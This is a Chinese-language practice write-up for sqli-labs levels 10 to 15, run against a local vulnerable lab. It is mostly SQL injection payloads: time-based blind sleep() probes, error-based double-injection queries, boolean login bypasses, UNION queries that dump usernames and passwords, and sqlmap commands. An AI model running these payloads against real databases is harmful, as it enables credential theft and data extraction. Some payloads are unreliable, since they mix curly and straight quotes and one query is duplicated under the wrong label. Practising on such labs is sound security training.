less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)
由于不管怎么输入都会被过滤,返回同一个结果,
所以只能用时间延迟注入
开始注入
?id=1''and sleep(3) --+
此时注入成功
开始爆库
?id=1'’ and if(length(database())=4 , sleep(3), 1) --+
当?id=1’ and if(length(database())=8 , sleep(3), 1) --+时明显延迟,所以库名长为8
当?id=1’ and if(left(database(),1)=‘s’ , sleep(3), 1) --+发现明显延迟说明库名第一个字符为 ‘s’
继续爆破?id=1’ and if(left(database(),8)=‘security’ , sleep(3), 1) --+,说明库名为 ‘security’
开始爆表
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(3), 1) --+
使用limit x,1 查询第x个表名,和爆破库名一样,第一个表名为referer。终于,在第三个表爆到users这个表,显然是用户信息表。
定向爆破password和username
慢慢爆,最后拿到结果的就是这两个
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password', sleep(3), 1) --+
爆到password
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password', sleep(3), 1) --+
爆到username
Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
post提交的方法,用burpsuit抓包但是社区版就很慢
改代理,抓包,发送到repeater,在repeater中通过修改post的参数
Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)
方法可以和第11题差不多吧
然后据说也可以用sqlmap
python sqlmap.py -r "http://localhost/sqli-labs-master/Less-12/" --technique E --dbms mysql --batch -v 0
和SQL注入
Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
查库,一个个改参数(limit n,1)
') or (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
查表,同样一个个改参数(limit n,1)
') or (select 1 from (select count(*),concat((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
查内容,还是一个个改参数(limit n,1)
') or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#
Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
我发现sqlmap来的最快而且方便
python sqlmap.py -r “http://localhost/sqli-labs-master/Less-14/” --technique E --dbms mysql --batch -v 0
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)
加单引号就报错,盲注,用' or 1=1 or '1'='2
和’)闭合,显示登陆成功
开始布尔型盲注:构造' or 1=(if(substr(version(),1,1)=5,1,0)) or '1'='2
显示登录成功,所以说明1=(if(substr(version(),1,1)=5,1,0))
为true
都是把构造好的语句替换1=1
开始联合注入,爆库,爆表,爆列,字段和用户名、密码
?id=-1' union select 1,group_concat(schema_name),1 from information_schema.schemata --+
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
?id=-1' union select 1,group_concat(concat_ws(':',username,password)),3 from users --+